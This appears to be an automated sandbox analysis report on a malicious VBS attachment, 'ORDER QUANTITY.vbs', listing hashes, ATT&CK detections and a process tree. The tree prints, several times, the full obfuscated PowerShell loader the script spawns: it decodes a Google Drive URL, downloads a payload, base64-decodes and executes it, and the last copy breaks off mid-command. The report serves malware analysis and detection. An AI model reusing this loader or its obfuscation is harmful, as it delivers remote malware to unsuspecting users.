c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c

General

Target

ORDER QUANTITY.vbs
Size

20KB
MD5

b4b8045f84ab0b8229af71524f891fb4
SHA1

f43aad4d678ba2e259b5a357aecb19d3329e03e3
SHA256

c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c
SHA512

0424d77750ca1a1d78932162a5e4c223c805bdc3c82c960c24b2512d439992953b1aec2b872c09e18901a81a3fd02d5b08575d0edccf0ec0d5b5ef887aa6421d
SSDEEP

384:ADlQ3GOmBsxCnQ8tcIgn9csOkKENYbXfzuzLfEO7FLpoMMqQW59Bh:B39cs8QqYesWEuXfnudoMDb

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2368	WScript.exe
7	2012	powershell.exe
9	2012	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2684	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2012	powershell.exe
2644	cmd.exe
2684	powershell.exe

System Time Discovery 1 TTPs 3 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
2012	powershell.exe
2644	cmd.exe
2684	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2684	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2012	powershell.exe
2684	powershell.exe
2684	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2012	2368	WScript.exe	30
PID 2368 wrote to memory of 2012	2368	WScript.exe	30
PID 2368 wrote to memory of 2012	2368	WScript.exe	30
PID 2012 wrote to memory of 2720	2012	powershell.exe	32
PID 2012 wrote to memory of 2720	2012	powershell.exe	32
PID 2012 wrote to memory of 2720	2012	powershell.exe	32
PID 2012 wrote to memory of 2644	2012	powershell.exe	35
PID 2012 wrote to memory of 2644	2012	powershell.exe	35
PID 2012 wrote to memory of 2644	2012	powershell.exe	35
PID 2644 wrote to memory of 2684	2644	cmd.exe	36
PID 2644 wrote to memory of 2684	2644	cmd.exe	36
PID 2644 wrote to memory of 2684	2644	cmd.exe	36
PID 2644 wrote to memory of 2684	2644	cmd.exe	36
PID 2684 wrote to memory of 2212	2684	powershell.exe	37
PID 2684 wrote to memory of 2212	2684	powershell.exe	37
PID 2684 wrote to memory of 2212	2684	powershell.exe	37
PID 2684 wrote to memory of 2212	2684	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDER QUANTITY.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
  2⤵
  - Blocklisted process makes network request
  - System Network Configuration Discovery: Internet Connection Discovery
  - System Time Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - System Time Discovery
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la 